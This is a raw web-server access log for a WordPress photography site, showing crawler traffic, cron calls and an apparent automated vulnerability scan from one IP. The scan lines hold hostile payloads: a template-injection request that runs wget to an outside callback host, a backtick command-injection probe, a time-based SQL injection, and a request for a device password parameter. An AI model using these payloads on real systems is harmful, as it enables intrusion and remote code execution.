206.189.247.132 - - [18/Oct/2025:11:07:27 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
138.68.166.157 - - [18/Oct/2025:11:07:27 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
45.133.172.208 - - [18/Oct/2025:11:07:28 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
216.73.216.159 - - [18/Oct/2025:11:07:52 -0400] "GET /products22761264?kg=0022483769 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:08:21 -0400] "GET /products235686532?kg=0232812387 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:09:36 -0400] "POST /wp-cron.php?doing_wp_cron=1760800176.1705670356750488281250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:11:10:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760800224.9760129451751708984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:10:38 -0400] "POST /conf_mail.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:10:38 -0400] "GET /products146536086?kg=0144749142 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
35.179.127.15 - - [18/Oct/2025:11:10:55 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
46.101.70.221 - - [18/Oct/2025:11:10:55 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
164.90.241.135 - - [18/Oct/2025:11:10:56 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:11:10:56 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
20.171.207.254 - - [18/Oct/2025:11:10:53 -0400] "GET /products60872172?kg=0060129911 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:11:05 -0400] "POST /wp-cron.php?doing_wp_cron=1760800265.1701700687408447265625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:11:08 -0400] "GET /products78156332?kg=0077203287 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:11:17 -0400] "GET /products56815828?kg=0056123035 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:11:57 -0400] "GET /products60926610?kg=0060183684 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:13:03 -0400] "POST /wp-cron.php?doing_wp_cron=1760800382.5722889900207519531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:13:03 -0400] "POST /app/options.py HTTP/1.1" 404 10854 "https://salhab360photos.com/app/login.py" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:13:04 -0400] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
157.20.32.210 - - [18/Oct/2025:11:13:18 -0400] "POST /app/options.py HTTP/1.1" 403 1242 "https://salhab360photos.com/app/login.py" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/11.0"
185.61.153.107 - - [18/Oct/2025:11:13:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760800405.5692429542541503906250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:13:20 -0400] "GET /products34979688?kg=0034553189 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:13:34 -0400] "GET /products34939302?kg=0034513294 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:09:32 -0400] "POST /bonita/loginservice HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
20.171.207.254 - - [18/Oct/2025:11:09:48 -0400] "GET /products60911654?kg=0060168910 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:11:10:15 -0400] "GET /products14755494?kg=0014575630 HTTP/1.1" 200 28929 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:10:18 -0400] "POST /ubus/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
157.20.32.210 - - [18/Oct/2025:11:10:19 -0400] "GET /page?id=34EYbM8gCcixKwkQ7VvI6MHNfAo&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d3pm34ikdbcl3g7iqchg6ggao6t8az6ae.oast.pro%27);s HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0"
98.70.29.56 - - [18/Oct/2025:11:10:28 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:11:10:43 -0400] "GET /products54860542?kg=0054191594 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:10:52 -0400] "GET /products206197984?kg=0203683457 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:11:02 -0400] "GET /products194063746?kg=0191697196 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:11:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760800283.0717558860778808593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:11:25 -0400] "GET /products32030762?kg=0031640224 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:12:58 -0400] "GET /products60918780?kg=0060175951 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:13:20 -0400] "POST /app/options.py HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:13:28 -0400] "GET /products89527400?kg=0088435685 HTTP/1.1" 404 9745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:11:13:34 -0400] "GET /products8028082?kg=0007930260 HTTP/1.1" 200 29244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:11:13:52 -0400] "GET /products50695238?kg=0050077086 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:13:59 -0400] "GET /products60895496?kg=0060152949 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:14:04 -0400] "POST /admin/index.php HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:11:13:40 -0400] "GET /products235663326?kg=0232789466 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:13:46 -0400] "GET /products54859148?kg=0054190215 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:13:57 -0400] "GET /products182055174?kg=0179835070 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:14:03 -0400] "GET /products107139974?kg=0105833470 HTTP/1.1" 404 9735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:14:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760800454.1731050014495849609375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:14:09 -0400] "GET /products50693348?kg=0050075219 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:11:14:16 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=107803 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:14:12 -0400] "GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
157.20.32.210 - - [18/Oct/2025:11:14:19 -0400] "POST /ccms/index.php HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:11:14:24 -0400] "GET /products233953626?kg=0231100616 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:11:14:35 -0400] "GET /categories/11198732 HTTP/1.1" 200 28990 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.159 - - [18/Oct/2025:11:14:34 -0400] "GET /products128700180?kg=0127130747 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:14:42 -0400] "GET /ccms/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29"
157.20.32.210 - - [18/Oct/2025:11:14:48 -0400] "POST /dfsms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
216.73.216.159 - - [18/Oct/2025:11:14:46 -0400] "GET /products22802724?kg=0022524723 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:14:55 -0400] "GET /ccms/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29"
157.20.32.210 - - [18/Oct/2025:11:14:57 -0400] "GET /dfsms/add-category.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:14:58 -0400] "GET /products218223242?kg=0215562064 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:14:13 -0400] "GET /admin/dashboard.php HTTP/1.1" 404 10901 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:14:15 -0400] "GET /live_check.shtml HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:14:15 -0400] "GET /products22754012?kg=0022476607 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:14:24 -0400] "POST /dfsms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
157.20.32.210 - - [18/Oct/2025:11:14:31 -0400] "GET /ccms/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29"
157.20.32.210 - - [18/Oct/2025:11:14:35 -0400] "POST /dfsms/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
185.61.153.107 - - [18/Oct/2025:11:15:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760800514.5701351165771484375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:15:08 -0400] "GET /dfsms/add-category.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:14:59 -0400] "GET /products60942068?kg=0060198955 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:15:21 -0400] "GET /dfsms/add-category.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:15:46 -0400] "GET /products76552822?kg=0075619334 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:11:16:02 -0400] "GET /products60930884?kg=0060187907 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:16:24 -0400] "POST /wp-cron.php?doing_wp_cron=1760800584.1680910587310791015625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:16:21 -0400] "POST /classes/Master.php?f=delete_inquiry HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:16:35 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 10846 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.8"
216.73.216.159 - - [18/Oct/2025:11:16:41 -0400] "GET /products179078410?kg=0176894608 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:16:42 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:11:17:05 -0400] "GET /products60911240?kg=0060168501 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:18:05 -0400] "POST /fileupload/toolsAny HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:18:14 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 301 0 "-" "-"
216.73.216.159 - - [18/Oct/2025:11:18:25 -0400] "GET /products56830592?kg=0056137617 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:11:15:05 -0400] "GET /products122043634?kg=0120555380 HTTP/1.1" 200 28896 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.159 - - [18/Oct/2025:11:15:10 -0400] "GET /products239664348?kg=0236741695 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:15:17 -0400] "POST /classes/Master.php?f=delete_request HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:11:15:22 -0400] "GET /products40729892?kg=0040233267 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:15:34 -0400] "GET /products153896534?kg=0152019830 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:11:16:16 -0400] "GET /?products14467420?kg=0014291071 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:16:14 -0400] "POST /classes/Master.php?f=delete_team HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
157.20.32.210 - - [18/Oct/2025:11:16:42 -0400] "PUT /v1/agent/check/register HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:16:52 -0400] "PUT /v1/agent/check/deregister/34EYbMlmU29AXwHzJtDpcVyw3Ap HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:17:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760800634.6715960502624511718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:17:05 -0400] "GET /products180282048?kg=0178083569 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:11:18:12 -0400] "GET /?products7198940?kg=0007111231 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:11:18:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760800696.1687209606170654296875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:18:06 -0400] "GET /products60884540?kg=0060142127 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:18:16 -0400] "GET /authenticationendpoint/34eybhadkrffdchw6jyohdqkngc.jsp HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
66.249.64.105 - - [18/Oct/2025:11:18:25 -0400] "GET /?products6695824?kg=0006614249 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:11:20:02 -0400] "GET /?products5090842?kg=0005028840 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:20:32 -0400] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10"
157.20.32.210 - - [18/Oct/2025:11:20:44 -0400] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 11643 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:20:46 -0400] "POST /hms/doctor/ HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
17.22.237.50 - - [18/Oct/2025:11:21:12 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.237.50 - - [18/Oct/2025:11:21:13 -0400] "GET /wp-content/uploads/2019/08/moment-09-h.jpg?326940= HTTP/1.1" 200 1633575 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.61.153.107 - - [18/Oct/2025:11:21:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760800879.0727989673614501953125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:21:13 -0400] "GET /products60872982?kg=0060130710 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:21:38 -0400] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:11:22:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760800935.4719350337982177734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:11:22:09 -0400] "GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
157.20.32.210 - - [18/Oct/2025:11:22:20 -0400] "POST /templates/default/html/windows/right.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/9.0"
